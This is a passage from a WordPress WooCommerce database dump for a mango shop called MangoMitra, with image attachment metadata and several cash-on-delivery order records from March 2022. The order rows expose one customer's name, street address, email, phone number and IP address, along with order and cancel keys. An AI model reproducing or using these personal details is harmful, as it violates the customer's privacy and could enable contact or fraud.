:4:\"file\";s:36:\"Untitled-2-Recovered-03-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-03-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-03-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:36:\"Untitled-2-Recovered-03-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:36:\"Untitled-2-Recovered-03-2048x957.png\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"Untitled-2-Recovered-03-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"Untitled-2-Recovered-03-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-03-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-03-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"Untitled-2-Recovered-03-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-03-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:33:\"Untitled-2-Recovered-03-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:33:\"Untitled-2-Recovered-03-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6885,1274,'_wp_attached_file','2022/03/Untitled-2-Recovered-04.png'),(6886,1274,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3834;s:6:\"height\";i:1792;s:4:\"file\";s:35:\"2022/03/Untitled-2-Recovered-04.png\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-04-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"Untitled-2-Recovered-04-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-04-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-04-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:36:\"Untitled-2-Recovered-04-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:36:\"Untitled-2-Recovered-04-2048x957.png\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"Untitled-2-Recovered-04-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"Untitled-2-Recovered-04-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-04-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-04-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"Untitled-2-Recovered-04-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-04-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:33:\"Untitled-2-Recovered-04-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:33:\"Untitled-2-Recovered-04-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6895,1275,'_wp_attached_file','2022/03/8-2.jpg'),(6896,1275,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:15:\"2022/03/8-2.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"8-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"8-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:15:\"8-2-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:13:\"8-2-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:15:\"8-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:15:\"8-2-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:13:\"8-2-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:15:\"8-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:13:\"8-2-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:13:\"8-2-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(6921,1277,'_order_key','wc_order_ETV0SU281CsNX'),(6922,1277,'_customer_user','29'),(6923,1277,'_payment_method','cod'),(6924,1277,'_payment_method_title','Cash on delivery'),(6925,1277,'_customer_ip_address','116.75.127.237'),(6926,1277,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36'),(6927,1277,'_created_via','checkout'),(6928,1277,'_cart_hash','fb4bd27186228250f840dbbaf8ae14bc'),(6929,1277,'_billing_first_name','pavithra'),(6930,1277,'_billing_last_name','g'),(6931,1277,'_billing_address_1','#800 Spandana towers , 19th main road .hsr layout 2nd sector'),(6932,1277,'_billing_address_2','near golden fresh super market'),(6933,1277,'_billing_city','bangalore'),(6934,1277,'_billing_state','KA'),(6935,1277,'_billing_postcode','560102'),(6936,1277,'_billing_country','IN'),(6937,1277,'_billing_email','utfhr.333@gmail.com'),(6938,1277,'_billing_phone','07411722844'),(6939,1277,'_shipping_first_name','pavithra'),(6940,1277,'_shipping_last_name','g'),(6941,1277,'_shipping_address_1','#800 Spandana towers , 19th main road .hsr layout 2nd sector'),(6942,1277,'_shipping_address_2','near golden fresh super market'),(6943,1277,'_shipping_city','bangalore'),(6944,1277,'_shipping_state','KA'),(6945,1277,'_shipping_postcode','560102'),(6946,1277,'_shipping_country','IN'),(6947,1277,'_order_currency','INR'),(6948,1277,'_cart_discount','0'),(6949,1277,'_cart_discount_tax','0'),(6950,1277,'_order_shipping','0'),(6951,1277,'_order_shipping_tax','0'),(6952,1277,'_order_tax','0'),(6953,1277,'_order_total','598.00'),(6954,1277,'_order_version','6.2.1'),(6955,1277,'_prices_include_tax','no'),(6956,1277,'_billing_address_index','pavithra g  #800 Spandana towers , 19th main road .hsr layout 2nd sector near golden fresh super market bangalore KA 560102 IN utfhr.333@gmail.com 07411722844'),(6957,1277,'_shipping_address_index','pavithra g  #800 Spandana towers , 19th main road .hsr layout 2nd sector near golden fresh super market bangalore KA 560102 IN '),(6959,1277,'_wc_cancel_key','4d7eb72cc5a7f41724262f7834ec927e'),(6961,1277,'is_magic_checkout_order','no'),(6962,1277,'_wcfmmp_order_processed','yes'),(6964,1277,'is_vat_exempt','no'),(6965,1277,'_download_permissions_granted','yes'),(6966,1277,'_recorded_sales','yes'),(6967,1277,'_recorded_coupon_usage_counts','yes'),(6968,1277,'_order_stock_reduced','yes'),(6969,1277,'_wcfm_new_order_notified','yes'),(6970,1277,'_wcfm_membership_order_processed','yes'),(6971,1277,'_wcpdf_invoice_settings','a:13:{s:24:\"display_shipping_address\";s:1:\"1\";s:13:\"display_email\";s:1:\"1\";s:13:\"display_phone\";s:1:\"1\";s:12:\"display_date\";s:12:\"invoice_date\";s:14:\"display_number\";s:14:\"invoice_number\";s:11:\"header_logo\";s:3:\"693\";s:18:\"header_logo_height\";s:0:\"\";s:9:\"shop_name\";a:1:{s:7:\"default\";s:10:\"MangoMitra\";}s:12:\"shop_address\";a:1:{s:7:\"default\";s:0:\"\";}s:6:\"footer\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_1\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_2\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_3\";a:1:{s:7:\"default\";s:0:\"\";}}'),(6972,1277,'_wcpdf_invoice_date','1647330475'),(6973,1277,'_wcpdf_invoice_date_formatted','2022-03-15 13:17:55'),(6974,1277,'_wcpdf_invoice_number','8'),(6975,1277,'_wcpdf_invoice_number_data','a:7:{s:6:\"number\";i:8;s:16:\"formatted_number\";s:1:\"8\";s:6:\"prefix\";N;s:6:\"suffix\";N;s:13:\"document_type\";s:7:\"invoice\";s:8:\"order_id\";i:1277;s:7:\"padding\";N;}'),(6976,1277,'_new_order_email_sent','true'),(6977,1277,'_wcfmmp_order_email_triggered','yes'),(6978,1277,'_date_completed','1647330565'),(6979,1277,'_date_paid','1647330565'),(6980,1277,'_paid_date','2022-03-15 13:19:25'),(6981,1277,'_completed_date','2022-03-15 13:19:25'),(6982,1278,'_order_key','wc_order_7WMdpdIEO8OdU'),(6983,1278,'_customer_user','29'),(6984,1278,'_payment_method','cod'),(6985,1278,'_payment_method_title','Cash on delivery'),(6986,1278,'_customer_ip_address','116.75.127.237'),(6987,1278,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36'),(6988,1278,'_created_via','checkout'),(6989,1278,'_cart_hash','49b866a5f6b4e23794772e165868f233'),(6990,1278,'_billing_first_name','pavithra'),(6991,1278,'_billing_last_name','g'),(6992,1278,'_billing_address_1','#800 Spandana towers , 19th main road .hsr layout 2nd sector'),(6993,1278,'_billing_address_2','near golden fresh super market'),(6994,1278,'_billing_city','bangalore'),(6995,1278,'_billing_state','KA'),(6996,1278,'_billing_postcode','560102'),(6997,1278,'_billing_country','IN'),(6998,1278,'_billing_email','utfhr.333@gmail.com'),(6999,1278,'_billing_phone','07411722844'),(7000,1278,'_shipping_first_name','pavithra'),(7001,1278,'_shipping_last_name','g'),(7002,1278,'_shipping_address_1','#800 Spandana towers , 19th main road .hsr layout 2nd sector'),(7003,1278,'_shipping_address_2','near golden fresh super market'),(7004,1278,'_shipping_city','bangalore'),(7005,1278,'_shipping_state','KA'),(7006,1278,'_shipping_postcode','560102'),(7007,1278,'_shipping_country','IN'),(7008,1278,'_order_currency','INR'),(7009,1278,'_cart_discount','0'),(7010,1278,'_cart_discount_tax','0'),(7011,1278,'_order_shipping','0'),(7012,1278,'_order_shipping_tax','0'),(7013,1278,'_order_tax','0'),(7014,1278,'_order_total','1597.00'),(7015,1278,'_order_version','6.2.1'),(7016,1278,'_prices_include_tax','no'),(7017,1278,'_billing_address_index','pavithra g  #800 Spandana towers , 19th main road .hsr layout 2nd sector near golden fresh super market bangalore KA 560102 IN utfhr.333@gmail.com 07411722844'),(7018,1278,'_shipping_address_index','pavithra g  #800 Spandana towers , 19th main road .hsr layout 2nd sector near golden fresh super market bangalore KA 560102 IN '),(7019,1278,'is_vat_exempt','no'),(7020,1278,'_order_has_preorder','yes'),(7021,1278,'_wcfmmp_order_processed','yes'),(7022,1278,'_wc_cancel_key','dc69fb6ad9a8ef4f887bcb3cb13340c7'),(7023,1278,'_download_permissions_granted','yes'),(7024,1278,'_recorded_sales','yes'),(7025,1278,'_recorded_coupon_usage_counts','yes'),(7026,1278,'_order_stock_reduced','yes'),(7027,1278,'_wcfm_new_order_notified','yes'),(7028,1278,'_wcfm_membership_order_processed','yes'),(7029,1278,'_wcpdf_invoice_settings','a:13:{s:24:\"display_shipping_address\";s:1:\"1\";s:13:\"display_email\";s:1:\"1\";s:13:\"display_phone\";s:1:\"1\";s:12:\"display_date\";s:12:\"invoice_date\";s:14:\"display_number\";s:14:\"invoice_number\";s:11:\"header_logo\";s:3:\"693\";s:18:\"header_logo_height\";s:0:\"\";s:9:\"shop_name\";a:1:{s:7:\"default\";s:10:\"MangoMitra\";}s:12:\"shop_address\";a:1:{s:7:\"default\";s:0:\"\";}s:6:\"footer\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_1\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_2\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_3\";a:1:{s:7:\"default\";s:0:\"\";}}'),(7030,1278,'_wcpdf_invoice_date','1647330657'),(7031,1278,'_wcpdf_invoice_date_formatted','2022-03-15 13:20:57'),(7032,1278,'_wcpdf_invoice_number','9'),(7033,1278,'_wcpdf_invoice_number_data','a:7:{s:6:\"number\";i:9;s:16:\"formatted_number\";s:1:\"9\";s:6:\"prefix\";N;s:6:\"suffix\";N;s:13:\"document_type\";s:7:\"invoice\";s:8:\"order_id\";i:1278;s:7:\"padding\";N;}'),(7034,1278,'_new_order_email_sent','true'),(7035,1278,'_wcfmmp_order_email_triggered','yes'),(7036,1279,'_order_key','wc_order_9Cfkud7nMciEf'),(7037,1279,'_customer_user','29'),(7038,1279,'_payment_method','cod'),(7039,1279,'_payment_method_title','Cash on delivery'),(7040,1279,'_customer_ip_address','116.75.127.237'),(7041,1279,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36'),(7042,1279,'_created_via','checkout'),(7043,1279,'_cart_hash','f18835846d96a51a37a470567bd83dc1'),(7044,1279,'_billing_first_name','pavithra'),(7045,1279,'_billing_last_name','g'),(7046,1279,'_billing_address_1','#800 Spandana towers , 19th main road .hsr layout 2nd sector'),(7047,1279,'_billing_address_2','near golden fresh super market'),(7048,1279,'_billing_city','bangalore'),(7049,1279,'_billing_state','KA'),(7050,1279,'_billing_postcode','560102'),(7051,1279,'_billing_country','IN'),(7052,1279,'_billing_email','utfhr.333@gmail.com'),(7053,1279,'_billing_phone','07411722844'),(7054,1279,'_shipping_first_name','pavithra'),(7055,1279,'_shipping_last_name','g'),(7056,1279,'_shipping_address_1','#800 Spandana towers , 19th main road .hsr layout 2nd sector'),(7057,1279,'_shipping_address_2','near golden fresh super market'),(7058,1279,'_shipping_city','bangalore'),(7059,1279,'_shipping_state','KA'),(7060,1279,'_shipping_postcode','560102'),(7061,1279,'_shipping_country','IN'),(7062,1279,'_order_currency','INR'),(7063,1279,'_cart_discount','0'),(7064,1279,'_cart_discount_tax','0'),(7065,1279,'_order_shipping','30'),(7066,1279,'_order_shipping_tax','0'),(7067,1279,'_order_tax','0'),(7068,1279,'_order_total','1029.00'),(7069,1279,'_order_version','6.2.1'),(7070,1279,'_prices_include_tax','no'),(7071,1279,'_billing_address_index','pavithra g  #800 Spandana towers , 19th main road .hsr layout 2nd sector near golden fresh super market bangalore KA 560102 IN utfhr.333@gmail.com 07411722844'),(7072,1279,'_shipping_address_index','pavithra g  #800 Spandana towers , 19th main road .hsr layout 2nd sector near golden fresh super market bangalore KA 560102 IN '),(7073,1279,'is_vat_exempt','no'),(7074,1279,'_order_has_preorder','yes'),(7075,1279,'_wcfmmp_order_processed','yes'),(7076,1279,'_wc_cancel_key','a53e129a0183ef5603317e339e5f4091'),(7077,1279,'_download_permissions_granted','yes'),(7078,1279,'_recorded_sales','yes'),(7079,1279,'_recorded_coupon_usage_counts','yes'),(7080,1279,'_order_stock_reduced','yes'),(7081,1279,'_wcfm_new_order_notified','yes'),(7082,1279,'_wcfm_membership_order_processed','yes'),(7083,1279,'_wcpdf_invoice_settings','a:13:{s:24:\"display_shipping_address\";s:1:\"1\";s:13:\"display_email\";s:1:\"1\";s:13:\"display_phone\";s:1:\"1\";s:12:\"display_date\";s:12:\"invoice_date\";s:14:\"display_number\";s:14:\"invoice_number\";s:11:\"header_logo\";s:3:\"693\";s:18:\"header_logo_height\";s:0:\"\";s:9:\"shop_name\";a:1:{s:7:\"default\";s:10:\"MangoMitra\";}s:12:\"shop_address\";a:1:{s:7:\"default\";s:0:\"\";}s:6:\"footer\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_1\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_2\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_3\";a:1:{s:7:\"default\";s:0:\"\";}}'),(7084,1279,'_wcpdf_invoice_date','1647331100'),(7085,1279,'_wcpdf_invoice_date_formatted','2022-03-15 13:28:20'),(7086,1279,'_wcpdf_invoice_number','10'),(7087,1279,'_wcpdf_invoice_number_data','a:7:{s:6:\"number\";i:10;s:16:\"formatted_number\";s:2:\"10\";s:6:\"prefix\";N;s:6:\"suffix\";N;s:13:\"document_type\";s:7:\"invoice\";s:8:\"order_id\";i:1279;s:7:\"padding\";N;}'),(7088,1279,'_new_order_email_sent','true'),(7089,1279,'_wcfmmp_order_email_triggered','yes'),(7090,1279,'_date_completed','1647331150'),(7091,1279,'_date_paid','1647331150'),(7092,1279,'_paid_date','2022-03-15 13:29:10'),(7093,1279,'_completed_date','2022-03-15 13:29:10'),(7094,1280,'_order_key','wc_order_DrlY1pZXI0fnG'),(7095,1280,'_customer_user','29'),(7096,1280,'_payment_method','cod'),(7097,1280,'_payment_method_title','Cash on delivery'),(7098,1280,'_customer_ip_address','116.75.127.237'),(7099,1280,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36'),(7100,1280,'_created_via','checkout'),(7101,1280,'_cart_hash','f18835846d96a51a37a470567bd83dc1'),(7102,1280,'_billing_first_name','pavithra'),(7103,1280,'_billing_last_name','g'),(7104,1280,'_billing_address_1','#800 Spandana towers , 19th main road .hsr layout 2nd sector'),(7105,1280,'_billing_address_2','near golden fresh super market'),(7106,1280,'_billing_city','bangalore'),(7107,1280,'_billing_state','KA'),(7108,1280,'_billing_postcode','560102'),(7109,1280,'_billing_country','IN'),(7110,1280,'_billing_email','utfhr.333@gmail.com'),(7111,1280,'_billing_phone','07411722844'),(7112,1280,'_shipping_first_name','pavithra'),(7113,1280,'_shipping_last_name','g'),(7114,1280,'_shipping_address_1','#800 Spandana towers , 19th main road .hsr layout 2nd sector'),(7115,1280,'_shipping_address_2','near golden fresh super market'),(7116,1280,'_shipping_city','bangalore'),(7117,1280,'_shipping_state','KA'),(7118,1280,'_shipping_postcode','560102'),(7119,1280,'_shipping_country','IN'),(7120,1280,'_order_currency','INR'),(7121,1280,'_cart_discount','0'),(7122,1280,'_cart_discount_tax','0'),(7123,1280,'_order_shipping','30'),(7124,1280,'_order_shipping_tax','0'),(7125,1280,'_order_tax','0'),(7126,1280,'_order_total','1029.00'),(7127,1280,'_order_version','6.2.1'),(7128,1280,'_prices_include_tax','no'),(7129,1280,'_billing_address_index','pavithra g  #800 Spandana towers , 19th main road .hsr layout 2nd sector near golden fresh super market bangalore KA 560102 IN utfhr.333@gmail.com 07411722844'),(7130,1280,'_shipping_address_index','pavithra g  #800 Spandana towers , 19th main road .hsr layout 2nd sector near golden fresh super market bangalore KA 560102 IN '),(7131,1280,'is_vat_exempt','no'),(7132,1280,'_order_has_preorder','yes'),(7133,1280,'_wcfmmp_order_processed','yes'),(7134,1280,'_wc_cancel_key','d5a496d844dc524c07394253bcf86c92'),(7135,1280,'_download_permissions_granted','yes'),(7136,1280,'_recorded_sales','yes'),(7137,1280,'_recorded_coupon_usage_counts','yes'),(7138,1280,'_order_stock_reduced','yes'),(7139,1280,'_wcfm_new_order_notified','yes'),(7140,1280,'_wcfm_membership_order_processed','yes'),(7141,1280,'_wcpdf_invoice_settings','a:13:{s:24:\"display_shipping_address\";s:1:\"1\";s:13:\"display_email\";s:1:\"1\";s:13:\"display_phone\";s:1:\"1\";s:12:\"display_date\";s:12:\"invoice_date\";s:14:\"display_number\";s:14:\"invoice_number\";s:11:\"header_logo\";s:3:\"693\";s:18:\"header_logo_height\";s:0:\"\";s:9:\"shop_name\";a:1:{s:7:\"default\";s:10:\"MangoMitra\";}s:12:\"shop_address\";a:1:{s:7:\"default\";s:0:\"\";}s:6:\"footer\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_1\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_2\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_3\";a:1:{s:7:\"default\";s:0:\"\";}}'),(7142,1280,'_wcpdf_invoice_date','1647331359'),(7143,1280,'_wcpdf_invoice_date_formatted','2022-03-15 13:32:39'),(7144,1280,'_wcpdf_invoice_number','11'),(7145,1280,'_wcpdf_invoice_number_data','a:7:{s:6:\"number\";i:11;s:16:\"formatted_number\";s:2:\"11\";s:6:\"prefix\";N;s:6:\"suffix\";N;s:13:\"document_type\";s:7:\"invoice\";s:8:\"order_id\";i:1280;s:7:\"padding\";N;}'),(7146,1280,'_new_order_email_sent','true'),(7147,1280,'_wcfmmp_order_email_triggered','yes'),(7149,1268,'_edit_lock','1647333503:1'),(7160,1286,'_wp_attached_file','2022/03/devgad-alphonso-1.jpg'),(7161,1286,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:29:\"2022/03/devgad-alphonso-1.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"devgad-alphonso-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"devgad-alphonso-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"devgad-alphonso-1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"devgad-alphonso-1-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"devgad-alphonso-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:29:\"devgad-alphonso-1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"devgad-alphonso-1-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"devgad-alphonso-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:27:\"devgad-alphonso-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:27:\"devgad-alphonso-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7242,1290,'_wp_attached_file','2022/03/bulk_booking_form-1.xlsx'),(7272,1299,'_wp_attached_file','2022/03/Artboard-1-8-1.png'),(7273,1299,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:26:\"2022/03/Artboard-1-8-1.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Artboard-1-8-1-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-1-8-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Artboard-1-8-1-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbn